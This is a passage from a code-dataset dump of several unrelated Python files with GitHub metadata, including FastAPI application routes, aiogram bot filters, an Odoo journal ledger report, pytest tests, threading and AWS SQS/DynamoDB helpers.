)\n","repo_name":"Kaicheng1995/SkiBot","sub_path":"Data/data_weather.py","file_name":"data_weather.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73414306329","text":"from fastapi import APIRouter, Depends, HTTPException\nfrom odmantic import ObjectId\nfrom odmantic.session import 
AIOSession\nfrom sqlalchemy.orm import Session\n\nfrom app.api.middlewares import mongo_db, db, jwt_bearer\nfrom app.core.logging import get_logging\nfrom app.core.config import get_app_settings\nfrom app.services import crud, documents\nfrom app.domain.models import FullTime, User, Application\nfrom app.domain.schemas import (ApplicationCreate,\n                                FullTimeCreate,\n                                FullTimeUpdate,\n                                Msg,\n                                FullTimeResponse,\n                                ApplicationResponse,\n                                InitialLetter,\n                                WorkPlan,\n                                ViceFormat,\n                                CronJobCreate,\n                                Application_statusCreate\n                                )\nfrom app.domain.errors import BaseErrors\n\n\nrouter = APIRouter()\n\nlog = get_logging(__name__)\nsettings = get_app_settings()\n\n\n@router.post(\"/\", response_model=FullTimeResponse)\nasync def create_full_time(\n    full_time: FullTimeCreate,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    engine: AIOSession = Depends(mongo_db.get_mongo_db),\n    db: Session = Depends(db.get_db)\n) -> FullTimeResponse:\n    \"\"\"\n    Endpoint to create an application of type full_time\n\n    params:\n    - body: full_timeCreate\n\n    response:\n    - full_time\n    \"\"\"\n    try:\n        full_time_created = await crud.full_time.create(db=engine,\n                                                        obj_in=FullTime(**dict(full_time)))\n        log.debug(' full_time_created', full_time_created)\n\n        application = ApplicationCreate(\n            mongo_id=str(full_time_created.id),\n            application_sub_type_id=full_time.application_sub_type_id,\n            user_id=current_user.id\n        )\n        application = crud.application.create(\n            db=db, who=current_user, obj_in=application, status=6, observation='El usuario inició la dedicación')\n    except BaseErrors as e:\n        await engine.remove(FullTime, FullTime.id == full_time_created.id)\n        log.error('BaseErrors')\n        raise HTTPException(e.code, e.detail)\n    except ValueError as e:\n        log.error('ValueError')\n        await engine.remove(FullTime, FullTime.id == full_time_created.id)\n        raise HTTPException(422, e)\n    except Exception as e:\n        log.error('Exception')\n        log.error(e)\n        await engine.remove(FullTime, FullTime.id == full_time_created.id)\n        raise HTTPException(422, \"Algo ocurrió mal\")\n    application = ApplicationResponse.from_orm(application)\n    response = FullTimeResponse(\n        **dict(application),\n        full_time=full_time_created\n    )\n    return response\n\n\n@router.get(\"/{id}\", response_model=FullTimeResponse)\nasync def get_full_time(\n    id: int,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    engine: AIOSession = Depends(mongo_db.get_mongo_db),\n    db: Session = Depends(db.get_db)\n) -> FullTimeResponse:\n    \"\"\"\n    Endpoint to get a full_time model from mongo\n\n    path-params:\n    -id: int, this is the id of the application, not of mongo\n\n    response:\n    -body: full_time\n    \"\"\"\n    try:\n        application = crud.application.get(db, current_user, id=id)\n        mongo_id = ObjectId(application.mongo_id)\n        if application:\n            full_time = await crud.full_time.get(engine, id=mongo_id)\n    except BaseErrors as e:\n        raise HTTPException(e.code, e.detail)\n    application_response = ApplicationResponse.from_orm(application)\n    response = FullTimeResponse(\n        **dict(application_response),\n        full_time=full_time\n    )\n    return response\n\n\n@router.put(\"/{id}\", status_code=200)\nasync def update_full_time(\n    id: int,\n    full_time: FullTimeUpdate,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    engine: AIOSession = Depends(mongo_db.get_mongo_db),\n    db: Session = Depends(db.get_db)\n) -> Application:\n    \"\"\"\n    Endpoint to update an application of type full_time\n\n    params:\n    -body: full_timeUpdate\n\n    path-params:\n    -id: int, this is the id of the application and not the mongo_id\n\n    response:\n    -body: full_time\n    \"\"\"\n\n    try:\n        # GET In PostgreSQL\n        application: Application = crud.application.get(\n            db=db, id=id, who=current_user)\n\n        if application:\n\n            # In MongoDB\n            mongo_id = ObjectId(application.mongo_id)\n            current_full_time = await crud.full_time.get(engine, id=mongo_id)\n\n            updated_full_time = await crud.full_time.update(engine, db_obj=current_full_time, obj_in=full_time)\n\n            status = Application_statusCreate(\n                application_id=application.id, status_id=1, observation=\"Dedicación exclusiva solicitada\")\n            crud.application_status.request(\n                db, who=current_user, obj_in=status, to=application, current=current_full_time)\n\n    except BaseErrors as e:\n        raise HTTPException(e.code, e.detail)\n\n    return application\n\n\n@router.delete(\"/{id}\", response_model=Msg)\nasync def delete_full_time(\n    id: int,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    engine: AIOSession = Depends(mongo_db.get_mongo_db),\n    db: Session = Depends(db.get_db)\n) -> Msg:\n    \"\"\"\n    Endpoint to delete an application of type full_time\n\n    params:\n    -id: int, this is the id of the application and not of mongo\n\n    response:\n    -msg: Msg\n    \"\"\"\n    try:\n        # First get the application from postgresql\n        application = crud.application.get(db, current_user, id=id)\n        # get id from the model sql\n        mongo_id = ObjectId(application.mongo_id)\n        # Delete object in postgresql\n        delete = crud.application.delete(db, current_user, id=id)\n        log.debug(delete)\n        if delete:\n            log.debug('Estamos en delete')\n            # delete object on Mongo\n            await crud.full_time.delete(engine, id=mongo_id)\n\n    except BaseErrors as e:\n        raise HTTPException(e.code, e.detail)\n    return Msg(msg=\"Comisión eliminada correctamente\")\n\n\n@router.put('/request/{id}')\ndef solicite_full_time(\n    id: int,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    db: Session = Depends(db.get_db)\n) -> Msg:\n    try:\n        application = crud.application.get(db, current_user, id=id)\n        update = crud.application.update(db, current_user, db_obj=application, obj_in={\n        }, status=1, observation='Usuario solicitó dedicación exclusiva')\n    except BaseErrors as e:\n        raise HTTPException(e.code, e.detail)\n    return {'msg': 'La solicitud se solicitó correctamente'}\n\n\n\n@router.put('/letter/{id}')\nasync def update_letter(\n    id: int,\n    letter: InitialLetter,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    engine: AIOSession = Depends(mongo_db.get_mongo_db),\n    db: Session = Depends(db.get_db)\n) -> FullTime:\n    try:\n        application: Application = crud.application.get(\n            db, current_user, id=id)\n        mongo_id = ObjectId(application.mongo_id)\n        full_time = await crud.full_time.get(engine, id=mongo_id)\n        log.debug(full_time.documents)\n        for document in full_time.documents:\n            if document['name'] == 'carta-inicio.pdf':\n                try:\n                    #delete = aws.s3.delete_contents_s3_bucket(settings.aws_bucket_name, file_name=document['path'])\n                    pass\n                except Exception as e:\n                    pass\n        path = await documents.initial_letter_generation(current_user, letter.body)\n        full_time = await crud.full_time.letter(engine,\n                                                id=mongo_id, letter=letter)\n        await crud.full_time.update_document(engine, id=mongo_id, name='carta-inicio.pdf', path=path)\n\n    except BaseErrors as e:\n        raise HTTPException(e.code, e.detail)\n    return full_time\n\n\n@router.put('/vice-format/{id}')\nasync def update_vice_format(\n    id: int,\n    vice_format: ViceFormat,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    engine: AIOSession = Depends(mongo_db.get_mongo_db),\n    db: Session = Depends(db.get_db)\n) -> FullTime:\n    try:\n        application: Application = crud.application.get(\n            db, current_user, id=id)\n        mongo_id = ObjectId(application.mongo_id)\n        full_time = await crud.full_time.vice_format(engine,\n                                                     id=mongo_id, vice_format=vice_format)\n\n        path = documents.fill_vice_document(current_user, full_time)\n        await crud.full_time.update_document(engine, id=mongo_id, name='formato-vicerrectoría.xlsx', path=path)\n    except BaseErrors as e:\n        raise HTTPException(e.code, e.detail)\n    return full_time\n\n\n@router.put('/work-plan/{id}')\nasync def update_work_plan(\n    id: int,\n    work_plan: WorkPlan,\n    *,\n    current_user: User = Depends(jwt_bearer.get_current_active_user),\n    engine: AIOSession = Depends(mongo_db.get_mongo_db),\n    db: Session = Depends(db.get_db)\n) -> FullTime:\n    try:\n        application: Application = crud.application.get(\n            db, current_user, id=id)\n        mongo_id = ObjectId(application.mongo_id)\n        full_time = await crud.full_time.work_plan(engine,\n                                                   id=mongo_id, work_plan=work_plan)\n        path = documents.fill_work_plan_format(current_user, full_time)\n        await crud.full_time.update_document(engine, id=mongo_id, name='plan-trabajo', path=path)\n    except BaseErrors as e:\n        raise HTTPException(e.code, e.detail)\n    return full_time\n\n","repo_name":"Equipo-de-desarrollo-FCEN-UDEA/siga","sub_path":"backend/app/api/versions/v1/routes/applications/full_time.py","file_name":"full_time.py","file_ext":"py","file_size_in_byte":9961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"2076271794","text":"\nfrom xstruct import pack\n\nfrom Header import Processed\n\nclass Resource(Processed):\n\t\"\"\"\\\n\t A Resource Description frame consists of:\n\t\t* a UInt32, Resource ID\n\t\t* a String, singular name of the resource\n\t\t* a String, plural name of the resource\n\t\t* a String, singular name of the resource's unit\n\t\t* a String, plural name of the resource's unit\n\t\t* a String, description of the resource\n\t\t* a UInt32, weight per unit of resource (0 for not applicable)\n\t\t* a UInt32, size per unit of resource (0 for not applicable)\n\t\t* a UInt64, the last modified time of this resource description\n\t\"\"\"\n\tno = 23\n\tstruct = \"ISSSSSIIT\"\n\n\tdef __init__(self, sequence, id, \\\n\t\t\tname_singular, name_plural, \\\n\t\t\tunit_singular, unit_plural, \\\n\t\t\tdescription, weight, size, modify_time):\n\t\tProcessed.__init__(self, sequence)\n\n\t\t# Length is: a UInt32 id, five 4-byte-length-prefixed strings,\n\t\t# two UInt32s (weight, size) and a UInt64 (modify_time)\n\t\tself.length = 4 + \\\n\t\t\t\t4 + len(name_singular) + \\\n\t\t\t\t4 + len(name_plural) + \\\n\t\t\t\t4 + len(unit_singular) + \\\n\t\t\t\t4 + len(unit_plural) + \\\n\t\t\t\t4 + len(description) + \\\n\t\t\t\t4 + 4 + 8\n\n\t\tself.id = id\n\t\tself.name_singular, self.name_plural = name_singular, name_plural\n\t\tself.unit_singular, self.unit_plural = unit_singular, unit_plural\n\t\tself.description, self.weight, self.size, self.modify_time = description, weight, size, modify_time\n\n\tdef name(self):\n\t\treturn self.name_singular\n\tname = property(name)\n\t\n\tdef __str__(self):\n\t\toutput = Processed.__str__(self)\n\t\toutput += pack(self.struct, self.id, \\\n\t\t\tself.name_singular, self.name_plural, \\\n\t\t\tself.unit_singular, self.unit_plural, \\\n\t\t\tself.description, self.weight, self.size, self.modify_time)\n\n\t\treturn 
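The `create_full_time` route above writes to two stores: it creates a Mongo document first, then a Postgres row that points at it, and it compensates by removing the Mongo document whenever the relational insert fails. A stripped-down sketch of that compensate-on-failure pattern (the `mongo` and `sql` objects here are hypothetical stand-ins, not the app's real services):

```python
# Hypothetical stand-ins; only the control flow is the point.
async def create_with_compensation(mongo, sql, payload):
    doc = await mongo.insert(payload)           # step 1: document store
    try:
        row = sql.insert(mongo_id=str(doc.id))  # step 2: relational row referencing the doc
    except Exception:
        await mongo.remove(doc.id)              # compensate: undo step 1 so no orphan doc remains
        raise
    return doc, row
```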
output\n","repo_name":"thousandparsec/libtpproto-py","sub_path":"tp/netlib/objects/Resource.py","file_name":"Resource.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"8607035053","text":"import pytest\nfrom swamp.syncmem import SynchronizedMemory\nfrom . import MockTransport\nfrom typing import Callable, List\nfrom swamp.message import SWAMPMessage, MemReset\n\n\n@pytest.fixture\ndef memory():\n transport = MockTransport()\n return SynchronizedMemory(transport, memory_size=8)\n\n\ndef test_synchronized_memory_write_commit(memory):\n \"\"\"Test that writing to the synchronized memory works and commits the transaction.\"\"\"\n memory.write([(3, 0xFF, 42)])\n\n assert memory.memory_cache[3] == 42\n assert memory.memory_committed[3] != 42\n\n memory.transport.process_transaction()\n assert memory.memory_committed[3] == 42\n\n\ndef test_synchronized_memory_write_error(memory):\n \"\"\"Test that writing to the synchronized memory handles transaction errors.\"\"\"\n memory.write([(3, 0xFF, 42)])\n\n assert memory.memory_cache[3] == 42\n assert memory.memory_committed[3] != 42\n\n with pytest.raises(RuntimeError):\n memory.transport.process_transaction(success=False)\n\n assert memory.memory_committed[3] != 42\n\n\ndef test_synchronized_memory_read(memory):\n \"\"\"Test that reading from the synchronized memory works.\"\"\"\n memory.write([(3, 0xFF, 42)])\n memory.transport.process_transaction()\n\n read_val = memory.read(3)\n assert read_val == 42\n\n\ndef test_synchronized_memory_read_committed(memory):\n \"\"\"Test that reading from the committed memory works.\"\"\"\n memory.write([(3, 0xFF, 42)])\n\n with pytest.raises(ValueError):\n memory.read(3, committed=True)\n\n memory.transport.process_transaction()\n\n read_val = memory.read(3, committed=True)\n assert read_val == 42\n\n\ndef test_synchronized_memory_reset(memory):\n \"\"\"Test that resetting the synchronized memory works.\"\"\"\n memory.write([(3, 0xFF, 42)])\n memory.transport.process_transaction()\n\n assert memory.memory_committed[3] == 42\n\n memory.transport.trigger_reset()\n assert memory.memory_committed[3] == 0\n assert memory.memory_cache[3] == 0\n","repo_name":"Phylex/swamp","sub_path":"tests/test_synchronized_mem.py","file_name":"test_synchronized_mem.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8190431977","text":"# -*- coding: utf-8 -*-\n__author__ = 'xiliangma'\n\n\nimport jpype, time, commands, os\nfrom SysConstant import PPD_CLASS_PATH, PPD_CONFIG, PPD_PATH\n\njvmArg = '-Djava.class.path=' + PPD_CLASS_PATH\njvmPath = jpype.getDefaultJVMPath()\n\n\nclass JpypeManager():\n\n def checPPDClient(self):\n errorCode = 0\n jrePath = jvmPath.split(\"server\")[0]\n soPath = jrePath + \"libpgJNI.so\"\n cplibpgJNIComm = \"cp \" + PPD_PATH + \"libpgJNI.so \" + jrePath\n if not os.path.exists(soPath):\n (errorCode, output) = commands.getstatusoutput(cplibpgJNIComm)\n return errorCode\n\n def startJPype(self):\n if not jpype.isJVMStarted():\n jpype.startJVM(jvmPath, jvmArg)\n\n\n def closeJPype(self):\n jpype.shutdownJVM()\n\n\nclass PPDClientManager():\n\n def loginPPDClient(self):\n JDClass = jpype.JClass('com.peergine.tool.pgTunnelSvrTool')\n oTool = JDClass()\n oTool.Run(PPD_CONFIG)\n return oTool\n\n\n# if __name__ == \"__main__\":\n# try:\n# pass\n# # ppdManager = PPDServiceManager()\n# # 
ppdManager.getPPDClient()\n# # ppdManager.loginPPDClient()\n# # time.sleep(3)\n# # ppdManager.ppdUserList()\n# except Exception as e:\n# print e.message","repo_name":"xiliangMa/AuthServer","sub_path":"backend/utils/PPDServiceManager.py","file_name":"PPDServiceManager.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8873546801","text":"a_list = [1, 2, 3, 4, 5, 6]\n\n# lst = []\n# for i in a_list:\n# lst.append(i*i)\n# print(lst)\n\n# even = []\n# odd = []\n#\n# [even.append(i) if i % 2 == 0 else odd.append(i) for i in a_list]\n#\n# print(even)\n# print(odd)\n\nx = [\"*\" for j in range(2) for i in range(2)]\nprint(x)","repo_name":"TechTouhid/The_Modern_Python_3_Bootcamp","sub_path":"PMC/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26968157115","text":"from abc import ABC\nfrom typing import Any, Union\n\nfrom aiogram import Bot, types\nfrom aiogram.filters import Filter\n\n\nclass IsChatAdmin(Filter, ABC):\n async def __call__(self, event: Union[types.Message, types.CallbackQuery], bot: Bot) -> bool:\n member = await bot.get_chat_member(event.chat.id, event.from_user.id)\n return isinstance(member, types.ChatMemberAdministrator)\n\n\nclass CanPromoteMembers(Filter, ABC):\n async def __call__(self, event: Union[types.Message, types.CallbackQuery], bot: Bot) -> bool:\n member = await bot.get_chat_member(event.chat.id, event.from_user.id)\n return (\n isinstance(member, types.ChatMemberAdministrator)\n and member.can_promote_members\n or isinstance(member, types.ChatMemberOwner)\n )\n\n\nclass ReplyRequired(Filter, ABC):\n def __init__(self, error_message: str = \"Reply to message is required\", notify: bool = True):\n self.error_message = error_message\n self.notify = notify\n\n async def __call__(self, event: types.Message, bot: Bot) -> Union[bool, dict[str, Any]]:\n if event.reply_to_message:\n return {\n \"reply\": event.reply_to_message,\n }\n\n if self.notify:\n await event.answer(self.error_message)\n return False\n","repo_name":"tshipenchko/lklubot","sub_path":"filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"40684951487","text":"from odoo import _, models\n\n\nclass JournalLedgerXslx(models.AbstractModel):\n _name = \"report.a_f_r.report_journal_ledger_xlsx\"\n _description = \"Journal Ledger XLSX Report\"\n _inherit = \"report.account_financial_report.abstract_report_xlsx\"\n\n def _get_report_name(self, report, data=False):\n company_id = data.get(\"company_id\", False)\n report_name = _(\"Journal Ledger\")\n if company_id:\n company = self.env[\"res.company\"].browse(company_id)\n suffix = \" - {} - {}\".format(company.name, company.currency_id.name)\n report_name = report_name + suffix\n return report_name\n\n def _get_report_columns(self, report):\n columns = [\n {\"header\": _(\"Entry\"), \"field\": \"entry\", \"width\": 18},\n {\"header\": _(\"Date\"), \"field\": \"date\", \"width\": 11},\n {\"header\": _(\"Account\"), \"field\": \"account_code\", \"width\": 9},\n ]\n\n if report.with_auto_sequence:\n columns.insert(\n 0, {\"header\": _(\"Sequence\"), \"field\": \"auto_sequence\", \"width\": 10}\n )\n\n if report.with_account_name:\n columns.append(\n {\"header\": _(\"Account Name\"), \"field\": 
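The `ReplyRequired` filter in the aiogram file above returns a dict on success, which aiogram 3 merges into the handler's keyword arguments, so the handler can receive the replied-to message directly. A hedged usage sketch (the router wiring and the `from filters import ...` module path are assumptions, not shown in the source):

```python
from aiogram import Router, types

from filters import ReplyRequired  # assumed module name for the file above

router = Router()

@router.message(ReplyRequired(error_message="Reply to a user's message first"))
async def promote_handler(message: types.Message, reply: types.Message):
    # `reply` is injected from the filter's returned {"reply": ...} dict
    await message.answer(f"Acting on message {reply.message_id}")
```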
\"account_name\", \"width\": 15}\n )\n\n columns += [\n {\"header\": _(\"Partner\"), \"field\": \"partner\", \"width\": 25},\n {\"header\": _(\"Ref - Label\"), \"field\": \"label\", \"width\": 40},\n {\"header\": _(\"Taxes\"), \"field\": \"taxes_description\", \"width\": 11},\n {\"header\": _(\"Debit\"), \"field\": \"debit\", \"type\": \"amount\", \"width\": 14},\n {\"header\": _(\"Credit\"), \"field\": \"credit\", \"type\": \"amount\", \"width\": 14},\n ]\n\n if report.foreign_currency:\n columns += [\n {\n \"header\": _(\"Currency\"),\n \"field\": \"currency_name\",\n \"width\": 14,\n \"type\": \"currency_name\",\n },\n {\n \"header\": _(\"Amount Currency\"),\n \"field\": \"amount_currency\",\n \"type\": \"amount\",\n \"width\": 18,\n },\n ]\n\n columns_as_dict = {}\n for i, column in enumerate(columns):\n columns_as_dict[i] = column\n return columns_as_dict\n\n def _get_journal_tax_columns(self, report):\n return {\n 0: {\"header\": _(\"Name\"), \"field\": \"tax_name\", \"width\": 35},\n 1: {\"header\": _(\"Description\"), \"field\": \"tax_code\", \"width\": 18},\n 2: {\n \"header\": _(\"Base Debit\"),\n \"field\": \"base_debit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 3: {\n \"header\": _(\"Base Credit\"),\n \"field\": \"base_credit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 4: {\n \"header\": _(\"Base Balance\"),\n \"field\": \"base_balance\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 5: {\n \"header\": _(\"Tax Debit\"),\n \"field\": \"tax_debit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 6: {\n \"header\": _(\"Tax Credit\"),\n \"field\": \"tax_credit\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n 7: {\n \"header\": _(\"Tax Balance\"),\n \"field\": \"tax_balance\",\n \"type\": \"amount\",\n \"width\": 14,\n },\n }\n\n def _get_col_count_filter_name(self):\n return 2\n\n def _get_col_count_filter_value(self):\n return 3\n\n def _get_report_filters(self, report):\n target_label_by_value = {\n value: label\n for value, label in self.env[\n \"journal.ledger.report.wizard\"\n ]._get_move_targets()\n }\n\n sort_option_label_by_value = {\n value: label\n for value, label in self.env[\n \"journal.ledger.report.wizard\"\n ]._get_sort_options()\n }\n\n return [\n [_(\"Company\"), report.company_id.name],\n [\n _(\"Date range filter\"),\n _(\"From: %(date_from)s To: %(date_to)s\")\n % ({\"date_from\": report.date_from, \"date_to\": report.date_to}),\n ],\n [\n _(\"Target moves filter\"),\n _(\"%s\") % target_label_by_value[report.move_target],\n ],\n [\n _(\"Entries sorted by\"),\n _(\"%s\") % sort_option_label_by_value[report.sort_option],\n ],\n [\n _(\"Journals\"),\n \", \".join(\n [\n \"{} - {}\".format(report_journal.code, report_journal.name)\n for report_journal in report.journal_ids\n ]\n ),\n ],\n ]\n\n def _generate_report_content(self, workbook, report, data, report_data):\n res_data = self.env[\n \"report.account_financial_report.journal_ledger\"\n ]._get_report_values(report, data)\n group_option = report.group_option\n if group_option == \"journal\":\n for ledger in res_data[\"Journal_Ledgers\"]:\n self._generate_journal_content(\n workbook, report, res_data, ledger, report_data\n )\n elif group_option == \"none\":\n self._generate_no_group_content(workbook, report, res_data, report_data)\n\n def _generate_no_group_content(self, workbook, report, res_data, report_data):\n self._generate_moves_content(\n workbook, \"Report\", report, res_data, res_data[\"Moves\"], report_data\n )\n self._generate_no_group_taxes_summary(workbook, report, res_data, 
report_data)\n\n def _generate_journal_content(\n self, workbook, report, res_data, ledger, report_data\n ):\n journal = self.env[\"account.journal\"].browse(ledger[\"id\"])\n currency_name = (\n journal.currency_id\n and journal.currency_id.name\n or journal.company_id.currency_id.name\n )\n sheet_name = \"{} ({}) - {}\".format(journal.code, currency_name, journal.name)\n self._generate_moves_content(\n workbook, sheet_name, report, res_data, ledger[\"report_moves\"], report_data\n )\n self._generate_journal_taxes_summary(workbook, ledger, report_data)\n\n def _generate_no_group_taxes_summary(self, workbook, report, res_data, report_data):\n self._generate_taxes_summary(\n workbook, \"Tax Report\", res_data[\"tax_line_data\"], report_data\n )\n\n def _generate_journal_taxes_summary(self, workbook, ledger, report_data):\n journal = self.env[\"account.journal\"].browse(ledger[\"id\"])\n currency_name = (\n journal.currency_id\n and journal.currency_id.name\n or journal.company_id.currency_id.name\n )\n sheet_name = \"Tax - {} ({}) - {}\".format(\n journal.code, currency_name, journal.name\n )\n self._generate_taxes_summary(\n workbook, sheet_name, ledger[\"tax_lines\"], report_data\n )\n\n def _generate_moves_content(\n self, workbook, sheet_name, report, res_data, moves, report_data\n ):\n report_data[\"workbook\"] = workbook\n report_data[\"sheet\"] = workbook.add_worksheet(sheet_name)\n self._set_column_width(report_data)\n\n report_data[\"row_pos\"] = 1\n\n self.write_array_title(sheet_name, report_data)\n report_data[\"row_pos\"] += 2\n\n self.write_array_header(report_data)\n account_ids_data = res_data[\"account_ids_data\"]\n partner_ids_data = res_data[\"partner_ids_data\"]\n currency_ids_data = res_data[\"currency_ids_data\"]\n move_ids_data = res_data[\"move_ids_data\"]\n for move in moves:\n for line in move[\"report_move_lines\"]:\n currency_data = currency_ids_data.get(line[\"currency_id\"], False)\n currency_name = currency_data and currency_data[\"name\"] or \"\"\n account_data = account_ids_data.get(line[\"account_id\"], False)\n account_name = account_data and account_data[\"name\"] or \"\"\n account_code = account_data and account_data[\"code\"] or \"\"\n move_data = move_ids_data.get(line[\"move_id\"], False)\n move_entry = move_data and move_data[\"entry\"] or \"\"\n line[\"partner\"] = self._get_partner_name(\n line[\"partner_id\"], partner_ids_data\n )\n line[\"auto_sequence\"] = line[\"auto_sequence\"]\n line[\"account_code\"] = account_code\n line[\"account_name\"] = account_name\n line[\"currency_name\"] = currency_name\n line[\"entry\"] = move_entry\n line[\"taxes_description\"] = report._get_ml_tax_description(\n line,\n res_data[\"tax_line_data\"].get(line[\"tax_line_id\"]),\n res_data[\"move_line_ids_taxes_data\"].get(\n line[\"move_line_id\"], False\n ),\n )\n self.write_line_from_dict(line, report_data)\n report_data[\"row_pos\"] += 1\n\n def _generate_taxes_summary(\n self, workbook, sheet_name, tax_lines_dict, report_data\n ):\n report_data[\"workbook\"] = workbook\n report_data[\"sheet\"] = workbook.add_worksheet(sheet_name)\n\n report_data[\"row_pos\"] = 1\n self.write_array_title(sheet_name, report_data)\n report_data[\"row_pos\"] += 2\n\n def _get_partner_name(self, partner_id, partner_data):\n if partner_id in partner_data.keys():\n return partner_data[partner_id][\"name\"]\n else:\n return 
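The journal ledger report above drives its whole layout from per-column dicts (`header`, `field`, `width`, optional `type`) keyed by position. A toy illustration of how such a spec can drive an xlsxwriter sheet, separate from the OCA module's actual abstract writer:

```python
# Toy example: a {position: column_spec} mapping sets widths, headers and cells.
import xlsxwriter

columns = {
    0: {"header": "Entry", "field": "entry", "width": 18},
    1: {"header": "Debit", "field": "debit", "width": 14, "type": "amount"},
}

workbook = xlsxwriter.Workbook("demo.xlsx")
sheet = workbook.add_worksheet("Report")
for pos, spec in columns.items():
    sheet.set_column(pos, pos, spec["width"])  # width comes from the spec
    sheet.write(0, pos, spec["header"])        # header row
record = {"entry": "INV/001", "debit": 100.0}
for pos, spec in columns.items():
    sheet.write(1, pos, record.get(spec["field"]))
workbook.close()
```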
\"\"\n","repo_name":"OCA/account-financial-reporting","sub_path":"account_financial_report/report/journal_ledger_xlsx.py","file_name":"journal_ledger_xlsx.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"31"} +{"seq_id":"41130296955","text":"\"\"\"\n if not call queue.task_done, task_queue.join() will hang there\n So task_done should be called after one item get from the queue had been processed\n\"\"\"\nfrom queue import Queue\nimport threading\n\n\nclass Consumer(threading.Thread):\n def __init__(self, tasks):\n threading.Thread.__init__(self)\n self.queue = tasks\n\n def run(self):\n while True:\n # using queue empty to exit consumer\n if self.queue.empty():\n break\n task = self.queue.get()\n print(task)\n self.queue.task_done()\n\n\nif __name__ == \"__main__\":\n task_queue = Queue()\n for i in range(6):\n task_queue.put(i)\n\n for i in range(5):\n t = Consumer(task_queue)\n t.start()\n\n task_queue.join()\n print(\"join called\")\n\n","repo_name":"xiangtian/pytest","sub_path":"queue_usage.py","file_name":"queue_usage.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9135310608","text":"# -- coding: utf-8 --\n\nimport os\nimport telepot\nimport json\nimport botocore.session\n\ndef create_client(client):\n aws_key_id = os.environ['ACCESS_KEY_ID']\n aws_key_secret = os.environ['SECRET_ACCESS_KEY']\n aws_region = os.environ['REGION']\n #log.debug('key: %s, secret: %s, region: %s', aws_key_id, aws_key_secret, aws_region)\n session = botocore.session.get_session()\n return session.create_client(client, region_name=aws_region,\n aws_secret_access_key=aws_key_secret,\n aws_access_key_id=aws_key_id)\n\nclass SQSHelper:\n __sqs = None\n __queue_url = None\n def __init__(self):\n if not SQSHelper.__sqs:\n SQSHelper.__sqs = create_client('sqs')\n SQSHelper.__queue_url = SQSHelper.__sqs.create_queue(QueueName='gpswatch-queue')['QueueUrl']\n self.client = SQSHelper.__sqs\n self.url = SQSHelper.__queue_url\n\n def send_message(self, msg):\n self.client.send_message(QueueUrl=self.url, MessageBody=msg)\n\nclass DynamoHelper:\n __dynamo = None\n def __init__(self):\n if not DynamoHelper.__dynamo:\n DynamoHelper.__dynamo = create_client('dynamodb')\n self.client = DynamoHelper.__dynamo\n\n def get_object(self, key, ts):\n res = self.client.get_item(\n TableName='gpswatch',\n Key={'device_id': {'S': key}, 'ts': {'N': '%s'%ts}},\n ConsistentRead=True,\n )\n return res.get('Item')\n\n def get_settings(self, key):\n return self.get_object(key, 0)\n\n \n def send_message(self, msg):\n self.client.put_item(\n TableName='gpswatch',\n Item=msg.to_dynamo()\n )\n \n SQSHelper().send_message(json.dumps({'id': msg.identifier, 'cmd': msg.cmd, 'direction': msg.direction}))\n\n def update_settings(self, key, expression, values):\n self.client.update_item(\n TableName='gpswatch',\n Key={'device_id': {'S': key}, 'ts': {'N': '0'}},\n UpdateExpression=expression,\n ExpressionAttributeValues=values)\n\n\n def active_devices(self, user_id):\n res = self.get_settings('TEL_%s'%user_id)\n return res['watches_device_id']['SS'] if res else None\n\n\n def query(self, **kwargs):\n while True:\n res = self.client.query(\n TableName='gpswatch',\n **kwargs\n )\n for item in res['Items']:\n yield item\n \n if 'LastEvaluatedKey' in res:\n kwargs['ExclusiveStartKey'] = res['LastEvaluatedKey']\n else:\n break\n\n\nbot = 
